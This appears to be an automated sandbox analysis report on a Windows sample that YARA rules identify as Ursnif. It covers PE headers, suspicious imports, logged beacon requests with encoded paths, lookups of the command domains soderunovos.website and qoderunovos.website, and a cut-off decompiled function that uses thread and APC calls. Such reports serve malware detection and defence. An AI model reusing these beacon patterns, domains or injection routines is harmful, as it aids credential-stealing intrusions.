                                                                                                                                SSDEEP:6144:0fcUtwkDhJYbsB/qMZSXuZet0yyen73jF20+Mpbz/CyU:0U2n1B/3ZSXuZet0yye7w0+MpC
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0.r"t..qt..qt..q...q]..q...qe..q...q...q}..q...qt..qq..q...qu..q...qu..q...qu..qRicht..q........PE..L.....``...................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:a2e8e8e8aaa2a488

                                                                                                                                Static PE Info

                                                                                                                                General

Entrypoint: 0x417cf0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp: 0x6060D3B3 [Sun Mar 28 19:06:27 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 62f526399c5bc6ba1d2354b3cc3131f3

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                mov edi, edi
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                call 00007FA350B87BBBh
                                                                                                                                call 00007FA350B878C6h
                                                                                                                                pop ebp
                                                                                                                                ret
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                mov edi, edi
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                push FFFFFFFEh
                                                                                                                                push 0042FAD0h
                                                                                                                                push 0041BF10h
                                                                                                                                mov eax, dword ptr fs:[00000000h]
                                                                                                                                push eax
                                                                                                                                add esp, FFFFFF98h
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                mov eax, dword ptr [00432064h]
                                                                                                                                xor dword ptr [ebp-08h], eax
                                                                                                                                xor eax, ebp
                                                                                                                                push eax
                                                                                                                                lea eax, dword ptr [ebp-10h]
                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                mov dword ptr [ebp-18h], esp
                                                                                                                                mov dword ptr [ebp-70h], 00000000h
                                                                                                                                lea eax, dword ptr [ebp-60h]
                                                                                                                                push eax
                                                                                                                                call dword ptr [00401368h]
                                                                                                                                cmp dword ptr [01FB5ABCh], 00000000h
                                                                                                                                jne 00007FA350B878C0h
                                                                                                                                push 00000000h
                                                                                                                                push 00000000h
                                                                                                                                push 00000001h
                                                                                                                                push 00000000h
                                                                                                                                call dword ptr [00401364h]
                                                                                                                                call 00007FA350B87A43h
                                                                                                                                mov dword ptr [ebp-6Ch], eax
                                                                                                                                call 00007FA350B8BA0Bh
                                                                                                                                test eax, eax
                                                                                                                                jne 00007FA350B878BCh
                                                                                                                                push 0000001Ch
                                                                                                                                call 00007FA350B87A00h
                                                                                                                                add esp, 04h
                                                                                                                                call 00007FA350B8B368h
                                                                                                                                test eax, eax
                                                                                                                                jne 00007FA350B878BCh
                                                                                                                                push 00000010h
                                                                                                                                call 00007FA350B879EDh
                                                                                                                                add esp, 04h
                                                                                                                                push 00000001h
                                                                                                                                call 00007FA350B8B2B3h
                                                                                                                                add esp, 04h
                                                                                                                                call 00007FA350B88F6Bh
                                                                                                                                mov dword ptr [ebp-04h], 00000000h
                                                                                                                                call 00007FA350B88B4Fh
                                                                                                                                test eax, eax

                                                                                                                                Rich Headers

                                                                                                                                Programming Language:
                                                                                                                                • [LNK] VS2010 build 30319
                                                                                                                                • [ASM] VS2010 build 30319
                                                                                                                                • [ C ] VS2010 build 30319
                                                                                                                                • [C++] VS2010 build 30319
                                                                                                                                • [RES] VS2010 build 30319
                                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                                Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x300b4 | 0x78 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1bb7000 | 0x5470 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1bbd000 | 0x17fc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1450 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x17b28 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x408 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                                                Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x30970 | 0x30a00 | False | 0.607316436375 | data | 7.03993935197 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x32000 | 0x1b84ac0 | 0x1400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x1bb7000 | 0x5470 | 0x5600 | False | 0.609783793605 | data | 5.95998340963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1bbd000 | 0x115e0 | 0x11600 | False | 0.0756379271583 | data | 0.97914473251 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

Name | RVA | Size | Type | Language | Country
YONAMIKORUFENI | 0x1bba700 | 0xee8 | ASCII text, with very long lines, with no line terminators | Spanish | Paraguay
RT_CURSOR | 0x1bbb5e8 | 0x8a8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317" | Divehi; Dhivehi; Maldivian | Maldives
RT_ICON | 0x1bb7330 | 0x8a8 | data | Spanish | Paraguay
RT_ICON | 0x1bb7bd8 | 0x6c8 | data | Spanish | Paraguay
RT_ICON | 0x1bb82a0 | 0x568 | GLS_BINARY_LSB_FIRST | Spanish | Paraguay
RT_ICON | 0x1bb8808 | 0x10a8 | data | Spanish | Paraguay
RT_ICON | 0x1bb98b0 | 0x988 | data | Spanish | Paraguay
RT_ICON | 0x1bba238 | 0x468 | GLS_BINARY_LSB_FIRST | Spanish | Paraguay
RT_STRING | 0x1bbbea8 | 0xfc | data | Divehi; Dhivehi; Maldivian | Maldives
RT_STRING | 0x1bbbfa8 | 0x26c | data | Divehi; Dhivehi; Maldivian | Maldives
RT_STRING | 0x1bbc218 | 0x254 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_GROUP_CURSOR | 0x1bbbe90 | 0x14 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_GROUP_ICON | 0x1bba6a0 | 0x5a | data | Spanish | Paraguay

                                                                                                                                Imports

DLL | Import
KERNEL32.dll | GetNumaNodeProcessorMask, SetCriticalSectionSpinCount, SearchPathW, SetInformationJobObject, lstrcmpA, FindFirstFileW, SetThreadContext, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, lstrlenA, EnumDateFormatsExW, CopyFileExW, GetNumaProcessorNode, TlsGetValue, SetLocalTime, UnmapViewOfFile, MoveFileExA, CommConfigDialogA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, SetErrorMode, FindResourceW, BuildCommDCBAndTimeoutsA, FreeLibrary, DeleteVolumeMountPointA, SetUnhandledExceptionFilter, LoadLibraryExW, SetDllDirectoryW, InterlockedIncrement, GetQueuedCompletionStatus, VerSetConditionMask, MoveFileExW, ReadConsoleA, InterlockedDecrement, WaitNamedPipeA, SetMailslotInfo, SetConsoleActiveScreenBuffer, WritePrivateProfileSectionA, SetDefaultCommConfigW, GetSystemWindowsDirectoryW, SetEnvironmentVariableW, CreateJobObjectW, SignalObjectAndWait, AddConsoleAliasW, GetComputerNameW, SetEvent, SetThreadExecutionState, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, _lclose, GetModuleHandleW, GetTickCount, GetCommConfig, GetProcessHeap, IsBadReadPtr, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetConsoleTitleA, CreateRemoteThread, GetCompressedFileSizeW, EnumTimeFormatsA, GetSystemWow64DirectoryA, SetCommTimeouts, CreateActCtxW, InitializeCriticalSection, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, OpenProcess, FindResourceExA, GlobalAlloc, GetPrivateProfileIntA, LoadLibraryW, GetConsoleMode, FatalAppExitW, GetThreadSelectorEntry, AssignProcessToJobObject, GetCalendarInfoA, ReadFileScatter, SetSystemTimeAdjustment, SetVolumeMountPointA, ReadConsoleOutputW, SetConsoleCP, InterlockedPopEntrySList, LeaveCriticalSection, GetFileAttributesA, GlobalFlags, lstrcpynW, GetNamedPipeInfo, HeapValidate, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA,
SetConsoleCursorPosition, VerifyVersionInfoA, HeapQueryInformation, WritePrivateProfileSectionW, TerminateProcess, GetAtomNameW, FileTimeToSystemTime, UnregisterWait, GetModuleFileNameW, lstrcatA, GetBinaryTypeW, CompareStringW, ExitThread, GetVolumePathNameA, lstrlenW, SetConsoleTitleA, WritePrivateProfileStringW, GlobalUnlock, VirtualUnlock, GetTempPathW, GetStringTypeExA, GetNamedPipeHandleStateW, GetLargestConsoleWindowSize, GetPrivateProfileIntW, InterlockedExchange, ReleaseActCtx, SetCurrentDirectoryA, GetStdHandle, FindFirstFileA, GetLastError, ChangeTimerQueueTimer, BackupRead, BindIoCompletionCallback, GetProcAddress, FindVolumeMountPointClose, GetLongPathNameA, VirtualAlloc, HeapSize, SetFirmwareEnvironmentVariableW, CreateNamedPipeA, CreateJobSet, LocalLock, LockFileEx, VerLanguageNameW, BuildCommDCBW, DefineDosDeviceA, FindClose, GetPrivateProfileStringA, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, MoveFileA, GetExitCodeThread, GetNumberFormatW, SetFileApisToANSI, QueryDosDeviceW, SetConsoleWindowInfo, SetThreadIdealProcessor, HeapWalk, GetPrivateProfileStructA, GetTapeParameters, GetVolumePathNamesForVolumeNameA, GetModuleFileNameA, GetDefaultCommConfigA, FindNextFileA, WriteProfileStringA, WTSGetActiveConsoleSessionId, EnumDateFormatsA, WaitCommEvent, _lread, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, IsDebuggerPresent, GetProcessAffinityMask, FatalExit, FreeEnvironmentStringsW, EnumResourceNamesA, WriteProfileStringW, EnumDateFormatsW, FatalAppExitA, PeekConsoleInputA, DeleteCriticalSection, WriteConsoleOutputAttribute, OutputDebugStringA, GetCPInfoExA, DuplicateHandle, FindFirstVolumeA, GetVersionExA, ReadConsoleInputW, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, DeleteTimerQueueTimer, GlobalAddAtomW, SetFileValidData, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, ReadConsoleOutputCharacterW, TlsFree, GetProfileSectionW, EnumSystemLocalesW, 
lstrcpyW, CopyFileExA, CreateFileW, SetStdHandle, GetPrivateProfileSectionNamesW, EnumResourceNamesW, GetThreadContext, IsDBCSLeadByte, GetFullPathNameA, RaiseException, GetCommandLineW, HeapSetInformation, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, DecodePointer, ExitProcess, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, EncodePointer, SetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, EnterCriticalSection, GetCurrentProcess, UnhandledExceptionFilter, HeapAlloc, HeapReAlloc, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, FlushFileBuffers
USER32.dll | GetMessageTime
GDI32.dll | GetBitmapBits
ADVAPI32.dll | InitiateSystemShutdownA, GetFileSecurityW
MSIMG32.dll | AlphaBlend

                                                                                                                                Possible Origin

Language of compilation system | Country where language is spoken
Spanish | Paraguay
Divehi; Dhivehi; Maldivian | Maldives

                                                                                                                                Network Behavior

                                                                                                                                TCP Packets

                                                                                                                                Nov 24, 2021 18:24:25.929764032 CET49721443192.168.2.387.248.100.216
                                                                                                                                Nov 24, 2021 18:24:25.930593014 CET49721443192.168.2.387.248.100.216
                                                                                                                                Nov 24, 2021 18:24:25.972871065 CET4434972187.248.100.216192.168.2.3
                                                                                                                                Nov 24, 2021 18:24:26.150295019 CET4434972187.248.100.216192.168.2.3
                                                                                                                                Nov 24, 2021 18:24:26.150407076 CET49721443192.168.2.387.248.100.216
                                                                                                                                Nov 24, 2021 18:24:26.150423050 CET4434972187.248.100.216192.168.2.3
                                                                                                                                Nov 24, 2021 18:24:26.150445938 CET4434972187.248.100.216192.168.2.3
                                                                                                                                Nov 24, 2021 18:24:26.150509119 CET49721443192.168.2.387.248.100.216
                                                                                                                                Nov 24, 2021 18:24:26.150522947 CET49721443192.168.2.387.248.100.216
                                                                                                                                Nov 24, 2021 18:24:26.152529001 CET49721443192.168.2.387.248.100.216
                                                                                                                                Nov 24, 2021 18:24:26.152566910 CET4434972187.248.100.216192.168.2.3

                                                                                                                                UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2021 18:24:25.005891085 CET | 59026 | 53 | 192.168.2.3 | 8.8.8.8
Nov 24, 2021 18:24:25.025409937 CET | 53 | 59026 | 8.8.8.8 | 192.168.2.3
Nov 24, 2021 18:24:25.798044920 CET | 49572 | 53 | 192.168.2.3 | 8.8.8.8
Nov 24, 2021 18:24:25.818571091 CET | 53 | 49572 | 8.8.8.8 | 192.168.2.3
Nov 24, 2021 18:24:46.316181898 CET | 53615 | 53 | 192.168.2.3 | 8.8.8.8
Nov 24, 2021 18:24:46.338320017 CET | 53 | 53615 | 8.8.8.8 | 192.168.2.3
Nov 24, 2021 18:26:06.369411945 CET | 60352 | 53 | 192.168.2.3 | 8.8.8.8
Nov 24, 2021 18:26:06.391844034 CET | 53 | 60352 | 8.8.8.8 | 192.168.2.3

                                                                                                                                DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 24, 2021 18:24:25.005891085 CET | 192.168.2.3 | 8.8.8.8 | 0x4a4 | Standard query (0) | yahoo.com | A (IP address) | IN (0x0001)
Nov 24, 2021 18:24:25.798044920 CET | 192.168.2.3 | 8.8.8.8 | 0xe878 | Standard query (0) | www.yahoo.com | A (IP address) | IN (0x0001)
Nov 24, 2021 18:24:46.316181898 CET | 192.168.2.3 | 8.8.8.8 | 0x802d | Standard query (0) | soderunovos.website | A (IP address) | IN (0x0001)
Nov 24, 2021 18:26:06.369411945 CET | 192.168.2.3 | 8.8.8.8 | 0xd72f | Standard query (0) | qoderunovos.website | A (IP address) | IN (0x0001)

                                                                                                                                DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 24, 2021 18:24:25.025409937 CET | 8.8.8.8 | 192.168.2.3 | 0x4a4 | No error (0) | yahoo.com |  | 74.6.231.21 | A (IP address) | IN (0x0001)
Nov 24, 2021 18:24:25.025409937 CET | 8.8.8.8 | 192.168.2.3 | 0x4a4 | No error (0) | yahoo.com |  | 74.6.143.26 | A (IP address) | IN (0x0001)
Nov 24, 2021 18:24:25.025409937 CET | 8.8.8.8 | 192.168.2.3 | 0x4a4 | No error (0) | yahoo.com |  | 74.6.143.25 | A (IP address) | IN (0x0001)
Nov 24, 2021 18:24:25.025409937 CET | 8.8.8.8 | 192.168.2.3 | 0x4a4 | No error (0) | yahoo.com |  | 74.6.231.20 | A (IP address) | IN (0x0001)
Nov 24, 2021 18:24:25.025409937 CET | 8.8.8.8 | 192.168.2.3 | 0x4a4 | No error (0) | yahoo.com |  | 98.137.11.164 | A (IP address) | IN (0x0001)
Nov 24, 2021 18:24:25.025409937 CET | 8.8.8.8 | 192.168.2.3 | 0x4a4 | No error (0) | yahoo.com |  | 98.137.11.163 | A (IP address) | IN (0x0001)
Nov 24, 2021 18:24:25.818571091 CET | 8.8.8.8 | 192.168.2.3 | 0xe878 | No error (0) | www.yahoo.com | new-fp-shed.wg1.b.yahoo.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 24, 2021 18:24:25.818571091 CET | 8.8.8.8 | 192.168.2.3 | 0xe878 | No error (0) | new-fp-shed.wg1.b.yahoo.com |  | 87.248.100.216 | A (IP address) | IN (0x0001)
Nov 24, 2021 18:24:25.818571091 CET | 8.8.8.8 | 192.168.2.3 | 0xe878 | No error (0) | new-fp-shed.wg1.b.yahoo.com |  | 87.248.100.215 | A (IP address) | IN (0x0001)
Nov 24, 2021 18:24:46.338320017 CET | 8.8.8.8 | 192.168.2.3 | 0x802d | Name error (3) | soderunovos.website | none | none | A (IP address) | IN (0x0001)
Nov 24, 2021 18:26:06.391844034 CET | 8.8.8.8 | 192.168.2.3 | 0xd72f | Name error (3) | qoderunovos.website | none | none | A (IP address) | IN (0x0001)

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • yahoo.com
                                                                                                                                • www.yahoo.com

                                                                                                                                HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49720 | 74.6.231.21 | 443 | C:\Users\user\Desktop\R0xLHA2mT5.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-24 17:24:25 UTC | 0 | OUT | GET /jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: yahoo.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cache-Control: no-cache
2021-11-24 17:24:25 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                Date: Wed, 24 Nov 2021 17:24:25 GMT
                                                                                                                                Connection: keep-alive
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Server: ATS
                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Language: en
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                Set-Cookie: B=0kqfhp5gpsta9&b=3&s=ki; expires=Thu, 24-Nov-2022 17:24:25 GMT; path=/; domain=.yahoo.com
                                                                                                                                Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                Location: https://www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw
                                                                                                                                Content-Length: 8
2021-11-24 17:24:25 UTC | 1 | IN | Data Raw: 72 65 64 69 72 65 63 74
Data Ascii: redirect


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49721 | 87.248.100.216 | 443 | C:\Users\user\Desktop\R0xLHA2mT5.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-24 17:24:25 UTC | 1 | OUT | GET /jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: www.yahoo.com
                                                                                                                                Cookie: B=0kqfhp5gpsta9&b=3&s=ki
2021-11-24 17:24:26 UTC | 1 | IN | HTTP/1.1 404 Not Found
                                                                                                                                date: Wed, 24 Nov 2021 17:24:25 GMT
                                                                                                                                p3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                                                                                                cache-control: private
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                x-envoy-upstream-service-time: 12
                                                                                                                                server: ATS
                                                                                                                                Content-Length: 1048
                                                                                                                                Age: 2
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=0p10fa5gpsta9&partner=;
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-XSS-Protection: 1; mode=block
2021-11-24 17:24:26 UTC | 2 | IN | Data Ascii: Set-Cookie: B=0kqfhp5gpsta9&b=3&s=ki; Expires=Thu, 24 Nov 2022 23:24:26 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"Referrer-Policy: no-ref
2021-11-24 17:24:26 UTC | 3 | IN | Data Ascii: <html><meta charset='utf-8'><script>var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fbxL1xwjyIDF%2fWhnrXJWmz2Twl8%2fgY8V0mj8FFAgQDgBa_2Fr%2fju3YDzGHJQvJy7Ul%2fWNFipJkcZdncwpj%2fywnxu6MUxONK0Xvi9f%2fucETuIFdm%2fwokZPT9


                                                                                                                                Code Manipulations


                                                                                                                                System Behavior

                                                                                                                                General

Start time: 18:23:55
Start date: 24/11/2021
Path: C:\Users\user\Desktop\R0xLHA2mT5.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\R0xLHA2mT5.exe"
Imagebase: 0x400000
File size: 298496 bytes
MD5 hash: 9F3B8462C508884F6966F3AD4A275799
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355113871.0000000004778000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355042494.0000000004778000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.559974818.00000000042A9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355017568.0000000004778000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355125356.0000000004778000.00000004.00000040.sdmp, Author: Joe Security
Reputation: low

                                                                                                                                Disassembly

                                                                                                                                Code Analysis


                                                                                                                                  Executed Functions

                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E004019A0() {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				long _v16;
                                                                                                                                  				void* _v40;
                                                                                                                                  				void* __edi;
                                                                                                                                  				long _t31;
                                                                                                                                  				long _t33;
                                                                                                                                  				long _t34;
                                                                                                                                  				void* _t37;
                                                                                                                                  				long _t40;
                                                                                                                                  				long _t41;
                                                                                                                                  				long _t45;
                                                                                                                                  				void* _t48;
                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t50;
                                                                                                                                  				signed int _t54;
                                                                                                                                  				signed int _t55;
                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t59;
                                                                                                                                  				long _t61;
                                                                                                                                  				signed int _t62;
                                                                                                                                  				void* _t66;
                                                                                                                                  				void* _t69;
                                                                                                                                  				signed int _t71;
                                                                                                                                  				signed int _t72;
                                                                                                                                  				void* _t75;
                                                                                                                                  				intOrPtr* _t76;
                                                                                                                                  
                                                                                                                                  				_t31 = E00401752();
                                                                                                                                  				_t59 = 0;
                                                                                                                                  				_v8 = _t31;
                                                                                                                                  				if(_t31 != 0) {
                                                                                                                                  					return _t31;
                                                                                                                                  				}
                                                                                                                                  				do {
                                                                                                                                  					_t71 = 0;
                                                                                                                                  					_v16 = _t59;
                                                                                                                                  					_v12 = 0x30;
                                                                                                                                  					do {
                                                                                                                                  						_t66 = E004016EE(_v12);
                                                                                                                                  						if(_t66 == _t59) {
                                                                                                                                  							_v8 = 8;
                                                                                                                                  						} else {
                                                                                                                                  							_t54 = NtQuerySystemInformation(8, _t66, _v12,  &_v16); // executed
                                                                                                                                  							_t62 = _t54;
                                                                                                                                  							_t55 = _t54 & 0x0000ffff;
                                                                                                                                  							_v8 = _t55;
                                                                                                                                  							if(_t55 == 4) {
                                                                                                                                  								_v12 = _v12 + 0x30;
                                                                                                                                  							}
                                                                                                                                  							_t72 = 0x13;
                                                                                                                                  							_t15 = _t62 + 1; // 0x1
                                                                                                                                  							_t71 =  *_t66 % _t72 + _t15;
                                                                                                                                  							E004017CB(_t66);
                                                                                                                                  						}
                                                                                                                                  					} while (_v8 != _t59);
                                                                                                                                  					_t33 = E004014AD(_t66, _t71); // executed
                                                                                                                                  					_v8 = _t33;
                                                                                                                                  					Sleep(_t71 << 4); // executed
                                                                                                                                  					_t34 = _v8;
                                                                                                                                  				} while (_t34 == 9);
                                                                                                                                  				if(_t34 != _t59) {
                                                                                                                                  					L28:
                                                                                                                                  					return _t34;
                                                                                                                                  				}
                                                                                                                                  				if(E004017E0(_t62,  &_v12) != 0) {
                                                                                                                                  					 *0x4030f8 = _t59;
                                                                                                                                  					L18:
                                                                                                                                  					_t37 = CreateThread(_t59, _t59, __imp__SleepEx,  *0x403100, _t59, _t59); // executed
                                                                                                                                  					_t75 = _t37;
                                                                                                                                  					if(_t75 == _t59) {
                                                                                                                                  						L25:
                                                                                                                                  						_v8 = GetLastError();
                                                                                                                                  						L26:
                                                                                                                                  						_t34 = _v8;
                                                                                                                                  						if(_t34 == 0xffffffff) {
                                                                                                                                  							_t34 = GetLastError();
                                                                                                                                  						}
                                                                                                                                  						goto L28;
                                                                                                                                  					}
                                                                                                                                  					_t40 = QueueUserAPC(E004013C4, _t75,  &_v40); // executed
                                                                                                                                  					if(_t40 == 0) {
